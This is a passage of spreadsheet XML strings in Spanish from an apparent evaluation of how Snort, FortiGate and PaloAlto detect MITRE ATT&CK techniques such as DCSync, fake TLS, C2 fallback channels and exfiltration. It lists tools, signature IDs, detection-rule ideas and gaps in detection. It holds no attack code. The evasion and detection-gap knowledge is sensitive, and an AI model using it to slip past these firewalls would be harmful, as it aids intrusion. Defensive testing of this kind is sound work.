    <t>Attackids (sin repetición)</t>
  </si>
  <si>
    <t>#Attackid</t>
  </si>
  <si>
    <t>Attackids FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>#Attackids FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>Attackids FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>#Attackids FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>Attackids FP (Manual)</t>
  </si>
  <si>
    <t>Attackids (Automático)</t>
  </si>
  <si>
    <t>Attackids TP (Manual)</t>
  </si>
  <si>
    <t>Attackids TP (Automático)</t>
  </si>
  <si>
    <t>Attackids FP Totales</t>
  </si>
  <si>
    <t>#Attackids FP Totales</t>
  </si>
  <si>
    <t>App (Control de Aplicaciones)</t>
  </si>
  <si>
    <t xml:space="preserve">App FPs (Control de Aplicaciones) </t>
  </si>
  <si>
    <t>COMENTARIOS DE LAS DETECCIONES FG</t>
  </si>
  <si>
    <t>DETECTABLE POR FG</t>
  </si>
  <si>
    <t>Nº FLUJOS IDENTIFICADOS POR FORTIGATE</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR FORTIGATE -  TOTAL</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR FORTIGATE - IPS</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR FORTIGATE - Control de Aplicaciones</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE EFICAZMENTE DETECTADOS</t>
  </si>
  <si>
    <t>% DETECCIÓN FLUJOS FORTIGATE</t>
  </si>
  <si>
    <t>% DETECCIÓN EFICAZ FLUJOS FORTIGATE</t>
  </si>
  <si>
    <t>% DETECCIÓN EFICAZ ATAQUE FORTIGATE</t>
  </si>
  <si>
    <t>App FPs(Control de Aplicaciones)</t>
  </si>
  <si>
    <t>threat_id (sin repetición)</t>
  </si>
  <si>
    <t>#threat_id</t>
  </si>
  <si>
    <t>threat_ids FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>#threat_ids FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>threat_ids FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>#threat_ids FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>threat_ids TP (Automático)</t>
  </si>
  <si>
    <t>threat_ids TP (Manual)</t>
  </si>
  <si>
    <t>threat_ids FP (Automático)</t>
  </si>
  <si>
    <t>threat_ids FP (Manual)</t>
  </si>
  <si>
    <t>threat_ids FP Totales</t>
  </si>
  <si>
    <t>#threat_ids FP Totales</t>
  </si>
  <si>
    <t>COMENTARIOS DE LAS DETECCIONES PA</t>
  </si>
  <si>
    <t>DETECTABLE POR PALOALTO</t>
  </si>
  <si>
    <t>Nº FLUJOS IDENTIFICADOS POR PALOALTO</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR PALOALTO- IPS</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR PALOALTO-  TOTAL</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR PALOALTO- Control de Aplicaciones</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE EFICACES DETECTADOS PALOALTO</t>
  </si>
  <si>
    <t>% DETECCIÓN FLUJOS CON ATAQUE PALOALTO</t>
  </si>
  <si>
    <t>% DETECCION FLUJOS EFICACES PALOALTO</t>
  </si>
  <si>
    <t>% DETECCIÓN EFICAZ ATAQUE PALOALTO</t>
  </si>
  <si>
    <t>USADO PARA CÁLCULO DE CAPACIDAD DE DETECCIÓN</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Inserción de información confidencial en una imagen JPG</t>
  </si>
  <si>
    <t>Covenant, SSH, scp, Powershell</t>
  </si>
  <si>
    <t>T1001.002-Data_obfuscation_steganography_[4].pcapng</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
  </si>
  <si>
    <t>Manual [4] /  3.18</t>
  </si>
  <si>
    <t>Manual [4] / B.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.18</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>✘</t>
  </si>
  <si>
    <t>LV1</t>
  </si>
  <si>
    <t>El uso de técnicas esteganográficas para ocultar datos es unívoca. No puede confundirse con actividad legítima</t>
  </si>
  <si>
    <t>L3</t>
  </si>
  <si>
    <t>2002752, 2002749</t>
  </si>
  <si>
    <t>0</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
  </si>
  <si>
    <t>FakeTLS (raykaryshyn Github)</t>
  </si>
  <si>
    <t>T1001.003-Data_obfuscation_protocol_impersonation_[4].pcapng</t>
  </si>
  <si>
    <t>TLS</t>
  </si>
  <si>
    <t>Regla genérica que analice el contenido y la estructura de los paquetes enviados para detectar una falsificación de protocolo. Adicionalmente se puede detectar con una regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
  </si>
  <si>
    <t>Manual [4] /  3.17</t>
  </si>
  <si>
    <t>Manual [4] / B.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.17</t>
  </si>
  <si>
    <t>La falsificación del protocolo TLS para acceder al equipo víctima es únivoca. No puede confundirse con actividad legítima.</t>
  </si>
  <si>
    <t>20022752, 2002749</t>
  </si>
  <si>
    <t>14978, 9999</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>Obtención de credenciales del usuario krbtgt (Usuario Kerberos Active Directory)</t>
  </si>
  <si>
    <t>mimikazt</t>
  </si>
  <si>
    <t>T1003-Os_credential_dumping_dcsync_[4].pcapng</t>
  </si>
  <si>
    <t>DCERPC</t>
  </si>
  <si>
    <t>Regla compuesta que detecte una llamada DCERPC Bind a la API DRSUAPI seguida de una llamada a la función DsGetNCChanges</t>
  </si>
  <si>
    <t>Manual [4] /  3.11</t>
  </si>
  <si>
    <t>Manual [4] / B.11</t>
  </si>
  <si>
    <t>Manual [4] / 4.11</t>
  </si>
  <si>
    <t>La obtención de credenciales del usuario krbtgt de manera no autorizada supone siempre un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 41701</t>
  </si>
  <si>
    <t>92322, 54406</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">:  </t>
    </r>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Traspaso de canal primario C2 a canal alternativo</t>
  </si>
  <si>
    <t>Covenant</t>
  </si>
  <si>
    <t>T1008-Fallback_channels_[4].pcapng</t>
  </si>
  <si>
    <t>SMB2</t>
  </si>
  <si>
    <t>Establecimiento del canal C&amp;C primario mediante Covenant - Command and Control</t>
  </si>
  <si>
    <t>SI*</t>
  </si>
  <si>
    <t>La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
  </si>
  <si>
    <t>Manual [4] /  3.19</t>
  </si>
  <si>
    <t>Manual [4] / B.19</t>
  </si>
  <si>
    <t>Manual [4] / 4.19</t>
  </si>
  <si>
    <t>La creación de un canal secundario de C&amp;C siempre es un ataque</t>
  </si>
  <si>
    <t>2027792, 2027793, 2027326</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="7"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027326</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793, 2027326</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>44489, 2101620, 2044666</t>
  </si>
  <si>
    <t>2027326, 
2027792, 2027793</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque incluye el establecimiento del canal primario además del secundario, siendo éste último el relevante para el ataque. Snort detecta ambos satisfactoriamente.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> FortiGate detecta el establecimiento del canal principal realizado con la herramienta Covenant. Sin embargo, no detecta el establecimiento del canal alternativo (basado en comunicaciones SMB). Por tanto, los correspondientes flujos no cuentan para los resultados finales</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">9999, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF34A853"/>
        <sz val="14.0"/>
      </rPr>
      <t>85585</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>, 92322</t>
    </r>
  </si>
  <si>
    <t>85585, 92322</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el uso de Covenant como herramienta de C2 y mediante el SID 92322 detecta el establecimiento de la sesión SMB, pero no la creación del canal alternativo. Además, detecta los mensajes beacon correspondientes a Covenant . Los flujos no contarán para el calculo de la capacidad de deteccion     </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos Detectados PA: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto no detecta los flujos correspondientes a ICMPv6</t>
    </r>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t xml:space="preserve"> T1011.001</t>
  </si>
  <si>
    <t>Extracción via Bluetooth</t>
  </si>
  <si>
    <t>Covenant, btobex, Bluetooth</t>
  </si>
  <si>
    <t>T1011-Exfiltration_over_bluetooth_[4].pcapng</t>
  </si>
  <si>
    <t>BLUETOOTH</t>
  </si>
  <si>
    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
  </si>
  <si>
    <t>Manual [4] /  3.23</t>
  </si>
  <si>
    <t>Manual [4] / B.23</t>
  </si>
  <si>
    <t>Manual [4] / 4.23</t>
  </si>
  <si>
    <t>LV2</t>
  </si>
  <si>
    <t>El uso de Bluetooth para extraer datos puede darse en contextos legítimos</t>
  </si>
  <si>
    <t>L2</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos Detectados FG: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>debido al error en la reproducción de la captura no se detectan flujos</t>
    </r>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y puertos</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>T1018-service_discovery_[3].pcapng</t>
  </si>
  <si>
    <t>TCP</t>
  </si>
  <si>
    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.1</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.5</t>
  </si>
  <si>
    <t>El descubrimiento de servicios, de forma general, se califica como ataque</t>
  </si>
  <si>
    <t>1421, 1418</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911, 1421, 1418</t>
  </si>
  <si>
    <t>2010937, 2002910, 2010935, 2002911</t>
  </si>
  <si>
    <t>2010936, 2010939, 1421, 1418</t>
  </si>
  <si>
    <t>2010937, 2002910, 2010935</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911, 1421, 1418</t>
  </si>
  <si>
    <t xml:space="preserve"> 2010936, 2010939, 200911, 1421, 1418</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911, 2002752, 2002749, 2101418, 2100615, 1421, 1418</t>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <t>2010936, 2010939, 2101418, 1421, 1418</t>
  </si>
  <si>
    <t>1421, 1418, 2002752, 2002749, 2101418, 2100615</t>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Detectados</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snort sólo dispone de reglas asociadas al escaneo de los puertos más comunes. Por esta razón, los porcentajes de detección son bastante bajos y se alejan del 100%, pues tan sólo se detecta el intento de descubrimiento de un rango minúsculo de puertos</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Detectados: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>el porcentaje de detección es bastante bajo. Esto se debe fundamentalmente a que cada puerto o servicio escaneado cuenta como un flujo con ataque distinto. Puesto que FortiGate sólo detecta los escaneos en los puertos más comunes, en global la detección se aleja del 100%</t>
    </r>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
  </si>
  <si>
    <t>SSH, Scapy</t>
  </si>
  <si>
    <t>T1020.001-Automated_exfiltration_traffic_duplication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
  </si>
  <si>
    <t>Manual [4] /  3.24</t>
  </si>
  <si>
    <t>Manual [4] / B.24</t>
  </si>
  <si>
    <t>Manual [4] / 4.24</t>
  </si>
  <si>
    <t>La ejecución de un script que habilite el reenvío de paquetes en el equipo víctima es un ataque</t>
  </si>
  <si>
    <t>402, 2044073</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044073, 2100402, 402</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402</t>
  </si>
  <si>
    <t>2044073, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados FG:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> la diferencia de flujos se debe a la presencia de reseteos de conexión. No hay pérdida de información</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>: PaloAlto no detecta el segundo establecimiento a SSH  duplicado</t>
    </r>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Sesión SSH</t>
  </si>
  <si>
    <t>T1021-remote_services_ssh_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica para detectar conexiones SSH entre un orígen y un servidor o destino dentro de la red a proteger.                                                               *Este ataque, si bien es detectable por red, es idéntico a un acceso legítimo, por lo que no es posible diferenciar uno de otro (salvo por anomalías relacionadas con direcciones IP o usuarios poco comunes)</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.48</t>
  </si>
  <si>
    <t>El uso de SSH es genérico, no siempre tiene que tratarse de un ataque</t>
  </si>
  <si>
    <t>PaloAlto genera una alerta para SSH aunque a nivel de Aplicación tambien se detecta. Por tanto, se considera solamente en un lado la contabilización del flujo</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Comunicación C2 para el establecimiento de extracción programada</t>
  </si>
  <si>
    <t>Covenant, Powershell</t>
  </si>
  <si>
    <t>T1029-Scheduled_transfer_[4].pcapng</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>Establecimiento del canal C&amp;C para la programación de la transferencia - Command and Control</t>
  </si>
  <si>
    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
  </si>
  <si>
    <t>Manual [4] /  3.25</t>
  </si>
  <si>
    <t>Manual [4] / B.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.25</t>
  </si>
  <si>
    <t>La programación de una exfiltración de datos es siempre un ataque</t>
  </si>
  <si>
    <t>2027792, 2027793, 1917</t>
  </si>
  <si>
    <t>2027792, 2027793</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101917, 1917</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749, 2101917</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1917</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101917, 1917</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749, 2101917, 1917</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
